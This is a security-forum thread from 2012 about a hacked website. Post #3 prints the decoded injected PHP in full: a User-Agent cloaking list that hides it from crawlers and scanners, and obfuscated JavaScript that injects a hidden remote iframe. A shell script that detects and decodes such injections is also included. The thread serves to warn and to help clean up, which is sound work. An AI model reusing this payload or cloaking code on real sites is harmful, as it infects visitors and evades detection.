hmmmm hacked

Discussion in 'Security' started by thedarkest1666, Apr 3, 2012.

  1. #1
    OK, so I may have a background in SEO, but hacking is not my bag...

    One of my sites, when you follow a link from Google Organic Search is redirecting to some spammy s**t website.

    Don't know who the wise guy is but the .htaccess file looks intact. How else do these guys get in and what file should I be looking at fixing please?
     
    thedarkest1666, Apr 3, 2012 IP
  2. thedarkest1666

    thedarkest1666 Active Member

    #2
    ...looks like a base64_decode hack to all the php files...
     
    thedarkest1666, Apr 3, 2012 IP
  3. ironmankho

    ironmankho Active Member

    #3
    Beware of Rapidleech scripts from warez sites and WordPress themes
    ---------------------------------------------------------------------
    Recently my friend installed a Rapidleech script from warez sites, plus WordPress themes, in my absence.
    When I returned after 1 week ...... I was shocked because my ESET Smart Security (updated version) showed me

    Threat
    JS/Iframe.CP trojan

    Information:
    Connection terminated - quarantined

    on every site.

    When I examined my hosting ....... every index page of my site had this code added:

    eval(base64_decode('...'));
    PHP:
    So beware, my friends: always check free themes and scripts for eval, otherwise you will be f*cked hard and your hosting provider will kick your ass.


    Decoded, the above code reads:

    <?php
    error_reporting(0);  // suppress PHP notices so the injection leaves no visible errors
    $bot = FALSE ;
    $ua = $_SERVER['HTTP_USER_AGENT'];
    // Cloaking list: any visitor whose User-Agent contains one of these strings
    // (search-engine crawlers, scanners, validators, Linux/Mac desktops, mobiles)
    // is treated as a "bot" and served nothing, which is why the site owner and
    // security crawlers see a clean page while ordinary Windows browsers do not.
    $botsUA = array('12345','alexa.com','anonymouse.org','bdbrandprotect.com','blogpulse.com','bot','buzztracker.com','crawl','docomo','drupal.org','feedtools','htmldoc','httpclient','internetseer.com','linux','macintosh','mac os','magent','mail.ru','mybloglog api','netcraft','openacoon.de','opera mini','opera mobi','playstation','postrank.com','psp','rrrrrrrrr','rssreader','slurp','snoopy','spider','spyder','szn-image-resizer','validator','virus','vlc media player','webcollage','wordpress','x11','yandex','iphone','android');
    // Case-insensitive substring match of the User-Agent against the list above
    foreach ($botsUA as $bs) {if(strpos(strtolower($ua), $bs)!== false){$bot = true; break;}}
    // Only non-"bot" visitors get the obfuscated script that injects the hidden iframe
    if (!$bot){
        echo '<script>c=2;i=c-2;if(parseInt("0123")===83)if(window.document)try{new String("asd").prototype.q}catch(egewgsd){f=['-30i-30i66i63i-7i1i61i72i60i78i70i62i71i77i7i64i62i77i30i69i62i70i62i71i77i76i27i82i45i58i64i39i58i70i62i1i0i59i72i61i82i0i2i52i9i54i2i84i-26i-30i-30i-30i66i63i75i58i70i62i75i1i2i20i-26i-30i-30i86i-7i62i69i76i62i-7i84i-26i-30i-30i-30i61i72i60i78i70i62i71i77i7i80i75i66i77i62i1i-5i21i66i63i75i58i70i62i-7i76i75i60i22i0i65i77i77i73i19i8i8i58i58i78i60i72i61i74i80i75i63i7i64i72i77i64i62i62i68i76i7i60i72i70i8i61i8i13i9i13i7i73i65i73i24i64i72i22i10i0i-7i80i66i61i77i65i22i0i10i9i0i-7i65i62i66i64i65i77i22i0i10i9i0i-7i76i77i82i69i62i22i0i79i66i76i66i59i66i69i66i77i82i19i65i66i61i61i62i71i20i73i72i76i66i77i66i72i71i19i58i59i76i72i69i78i77i62i20i69i62i63i77i19i9i20i77i72i73i19i9i20i0i23i21i8i66i63i75i58i70i62i23i-5i2i20i-26i-30i-30i86i-26i-30i-30i63i78i71i60i77i66i72i71i-7i66i63i75i58i70i62i75i1i2i84i-26i-30i-30i-30i79i58i75i-7i63i-7i22i-7i61i72i60i78i70i62i71i77i7i60i75i62i58i77i62i30i69i62i70i62i71i77i1i0i66i63i75i58i70i62i0i2i20i63i7i76i62i77i26i77i77i75i66i59i78i77i62i1i0i76i75i60i0i5i0i65i77i77i73i19i8i8i58i58i78i60i72i61i74i80i75i63i7i64i72i77i64i62i62i68i76i7i60i72i70i8i61i8i13i9i13i7i73i65i73i24i64i72i22i10i0i2i20i63i7i76i77i82i69i62i7i79i66i76i66i59i66i69i66i77i82i22i0i65i66i61i61i62i71i0i20i63i7i76i77i82i69i62i7i73i72i76i66i77i66i72i71i22i0i58i59i76i72i69i78i77i62i0i20i63i7i76i77i82i69i62i7i69i62i63i77i22i0i9i0i20i63i7i76i77i82i69i62i7i77i72i73i22i0i9i0i20i63i7i76i62i77i26i77i77i75i66i59i78i77i62i1i0i80i66i61i77i65i0i5i0i10i9i0i2i20i63i7i76i62i77i26i77i77i75i66i59i78i77i62i1i0i65i62i66i64i65i77i0i5i0i10i9i0i2i20i-26i-30i-30i-30i61i72i60i78i70i62i71i77i7i64i62i77i30i69i62i70i62i71i77i76i27i82i45i58i64i39i58i70i62i1i0i59i72i61i82i0i2i52i9i54i7i58i73i73i62i71i61i28i65i66i69i61i1i63i2i20i-26i-30i-30i86'][0].split('i');md='a';v="ev"+"al";}if(v)e=window[v];w=f;s=[];r=String;for(;599!=i;i+=1){j=i;s+=r["fromC"+"harCode"](39+1*w[j]);}
    if(f)z=s;e(z);</script>';
    }   // end of the non-"bot" branch
    
    ?>
    PHP:
     
    ironmankho, Apr 3, 2012 IP
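    Added example (not code from any poster in this thread): a POSIX shell script that performs the two checks posts #2 and #3 describe, locating PHP files that carry an eval(base64_decode(...)) injection, listing recently modified PHP files to correlate with the last known-clean date, and decoding the payload for reading without executing it. The sample site it builds in a temp directory is constructed, and injected.invalid is a placeholder host.

```shell
#!/bin/sh
# Constructed sample site: one clean PHP file and one index.php carrying a
# one-line eval(base64_decode('...')) injection like the one in the thread.
# The embedded payload only echoes a placeholder iframe (injected.invalid).
make_sample_site() {
  dir=$(mktemp -d)
  printf '<?php\necho "hello";\n' > "$dir/clean.php"
  payload=$(printf '%s' "<?php error_reporting(0); echo '<iframe src=http://injected.invalid/></iframe>';" | base64 | tr -d '\n')
  printf "<?php eval(base64_decode('%s'));?><?php\necho \"home\";\n" "$payload" > "$dir/index.php"
  echo "$dir"
}

# List PHP files under $1 that contain the usual obfuscated-eval wrappers.
find_injected_php() {
  find "$1" -name '*.php' -exec grep -lE 'eval *\((base64_decode|gzinflate|str_rot13)' {} +
}

# List PHP files under $1 changed within the last $2 days (default 7), to
# correlate with when the site was last known to be clean.
find_recent_php() {
  find "$1" -name '*.php' -mtime "-${2:-7}"
}

# Extract the quoted argument of the first base64_decode( in $1 and decode it
# with base64(1) so the payload can be read. It is printed, never executed.
decode_payload() {
  sed -n "s|.*base64_decode('\([A-Za-z0-9+/=]*\)').*|\1|p" "$1" | head -n 1 | base64 -d
}

if [ "${1:-}" = "--demo" ]; then
  site=$(make_sample_site)
  echo "Injected files:"; find_injected_php "$site"
  echo "Recently changed PHP files:"; find_recent_php "$site"
  echo "Decoded payload:"; decode_payload "$site/index.php"; echo
  rm -rf "$site"
fi
```

    Run with --demo to see it against the constructed site; on a real host point find_injected_php at the web root and compare its output with a clean backup before cleaning, since the injection is usually in every PHP file, not only index.php.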
  4. ryan_uk

    ryan_uk Illustrious Member

    #4
    A bit more information, mate. Is it a hand-coded site or are you using Wordpress, for example?
     
    ryan_uk, Apr 4, 2012 IP
  5. tiffanywilliams12i2

    tiffanywilliams12i2 Peon

    #5
    Did you update? Check for shells? Backdoors? Logs? There is a lot involved in finding out what happened.
     
    tiffanywilliams12i2, Apr 5, 2012 IP